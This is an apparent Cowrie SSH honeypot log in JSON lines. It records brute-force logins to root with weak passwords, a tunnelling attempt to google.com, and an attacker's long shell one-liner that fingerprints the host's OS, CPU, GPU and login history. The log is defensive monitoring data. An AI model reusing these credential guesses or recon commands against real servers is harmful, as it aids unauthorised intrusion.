{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_9.9","message":"Remote SSH version: SSH-2.0-OpenSSH_9.9","sensor":"my-vps","timestamp":"2025-08-26T20:38:54.394926Z","src_ip":"212.227.235.229","session":"f363b16a6559"}
{"eventid":"cowrie.client.kex","hassh":"1cc79c7da9b5d5eead2c60983332a556","hasshAlgorithms":"sntrup761x25519-sha512,sntrup761x25519-sha512@openssh.com,mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["sntrup761x25519-sha512","sntrup761x25519-sha512@openssh.com","mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 1cc79c7da9b5d5eead2c60983332a556","sensor":"my-vps","timestamp":"2025-08-26T20:38:54.514997Z","src_ip":"212.227.235.229","session":"f363b16a6559"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","sensor":"my-vps","timestamp":"2025-08-26T20:38:55.167742Z","src_ip":"212.227.235.229","session":"f363b16a6559"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T20:38:55.168451Z","src_ip":"212.227.235.229","session":"f363b16a6559"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:38:55.345821Z","src_ip":"212.227.235.229","session":"f363b16a6559"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59855,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d57bad11464","protocol":"ssh","message":"New connection: 212.227.235.229:59855 (1.2.3.4:22) [session: 8d57bad11464]","sensor":"my-vps","timestamp":"2025-08-26T20:38:56.269067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T20:38:56.278569Z","src_ip":"212.227.235.229","session":"8d57bad11464"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T20:38:56.406047Z","src_ip":"212.227.235.229","session":"8d57bad11464"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T20:38:56.969990Z","src_ip":"212.227.235.229","session":"8d57bad11464"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:38:58.100593Z","src_ip":"212.227.235.229","session":"8d57bad11464"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"google.com","dst_port":443,"src_ip":"212.227.235.229","src_port":59888,"message":"direct-tcp connection request to google.com:443 from 127.0.0.1:59888","sensor":"my-vps","timestamp":"2025-08-26T20:39:18.210477Z","session":"f363b16a6559"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"google.com","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x039\\x1duD\\x88\\xc4\\xce\\x1f\\xbb5Lp\\x1fO\\x86=\\x11Z'\\xbc\\x9a/,!\\xc3\\xbcr\\x84\\x15J\\xfc\\xae \\x94\\x00\\x8b\\xa6\\x00\\x90\\x11P\\xdf\\x97\\xb4\\xd7\\xe5u\\xc8\\xd0!N\\x9b\\xcd\\x8dP\\xa9\\x86\\x98\\xcc)`\\xfd\\xed\\xa8\\x02\\x00>\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\x00\\x9f\\xcc\\xa9\\xcc\\xa8\\xcc\\xaa\\xc0+\\xc0/\\x00\\x9e\\xc0$\\xc0(\\x00k\\xc0#\\xc0'\\x00g\\xc0\\n\\xc0\\x14\\x009\\xc0\\t\\xc0\\x13\\x003\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01u\\x00\\x00\\x00\\x0f\\x00\\r\\x00\\x00\\ngoogle.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0e\\x00\\x0c\\x02h2\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x000\\x00.\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x02\\x03\\x03\\x01\\x02\\x01\\x03\\x02\\x02\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\t\\x08\\x03\\x04\\x03\\x03\\x03\\x02\\x03\\x01\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xb5\\xe5qF#\\x99\\xedN\\x81\\xfe\\xdd\\x06w\\x11\\xda\\x0f\\xb8\\xc2\\xd5\\x15{\\x12\\xf3\\xc8>\\xd0\\x9ad\\xe6m\\xa3S\\x00\\x15\\x00\\xb7\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to google.com:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x039\\x1duD\\x88\\xc4\\xce\\x1f\\xbb5Lp\\x1fO\\x86=\\x11Z'\\xbc\\x9a/,!\\xc3\\xbcr\\x84\\x15J\\xfc\\xae \\x94\\x00\\x8b\\xa6\\x00\\x90\\x11P\\xdf\\x97\\xb4\\xd7\\xe5u\\xc8\\xd0!N\\x9b\\xcd\\x8dP\\xa9\\x86\\x98\\xcc)`\\xfd\\xed\\xa8\\x02\\x00>\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\x00\\x9f\\xcc\\xa9\\xcc\\xa8\\xcc\\xaa\\xc0+\\xc0/\\x00\\x9e\\xc0$\\xc0(\\x00k\\xc0#\\xc0'\\x00g\\xc0\\n\\xc0\\x14\\x009\\xc0\\t\\xc0\\x13\\x003\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01u\\x00\\x00\\x00\\x0f\\x00\\r\\x00\\x00\\ngoogle.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0e\\x00\\x0c\\x02h2\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x000\\x00.\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x02\\x03\\x03\\x01\\x02\\x01\\x03\\x02\\x02\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\t\\x08\\x03\\x04\\x03\\x03\\x03\\x02\\x03\\x01\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xb5\\xe5qF#\\x99\\xedN\\x81\\xfe\\xdd\\x06w\\x11\\xda\\x0f\\xb8\\xc2\\xd5\\x15{\\x12\\xf3\\xc8>\\xd0\\x9ad\\xe6m\\xa3S\\x00\\x15\\x00\\xb7\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T20:39:18.387775Z","src_ip":"212.227.235.229","session":"f363b16a6559"}
{"eventid":"cowrie.session.closed","duration":"24.3","message":"Connection lost after 24.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:39:18.617817Z","src_ip":"212.227.235.229","session":"f363b16a6559"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64384,"dst_ip":"1.2.3.4","dst_port":22,"session":"93b6bb7fb54a","protocol":"ssh","message":"New connection: 217.72.205.35:64384 (1.2.3.4:22) [session: 93b6bb7fb54a]","sensor":"my-vps","timestamp":"2025-08-26T20:39:43.529252Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:39:43.530585Z","src_ip":"217.72.205.35","session":"93b6bb7fb54a"}
{"eventid":"cowrie.session.closed","duration":"301.3","message":"Connection lost after 301.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:40:44.272305Z","src_ip":"212.227.235.229","session":"0349e11678f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41752,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbecf0ac6add","protocol":"ssh","message":"New connection: 212.227.235.229:41752 (1.2.3.4:22) [session: cbecf0ac6add]","sensor":"my-vps","timestamp":"2025-08-26T20:40:54.977481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:40:55.803925Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:40:55.804710Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.login.success","username":"root","password":"123qwe","message":"login attempt [root/123qwe] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:40:59.629212Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:41:01.866370Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T20:41:01.867237Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:41:01.868111Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:41:01.869331Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T20:41:01.870510Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:41:01.871450Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:41:01.872253Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T20:41:01.873955Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T20:41:01.874575Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:41:01.875333Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:41:01.876040Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:41:01.876756Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:41:01.877496Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T20:41:03.140219Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:41:03.141262Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:41:03.142599Z","src_ip":"212.227.235.229","session":"cbecf0ac6add"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51430,"dst_ip":"1.2.3.4","dst_port":22,"session":"073de0ee788b","protocol":"ssh","message":"New connection: 212.227.235.229:51430 (1.2.3.4:22) [session: 073de0ee788b]","sensor":"my-vps","timestamp":"2025-08-26T20:41:14.081410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:41:14.082335Z","src_ip":"212.227.235.229","session":"073de0ee788b"}
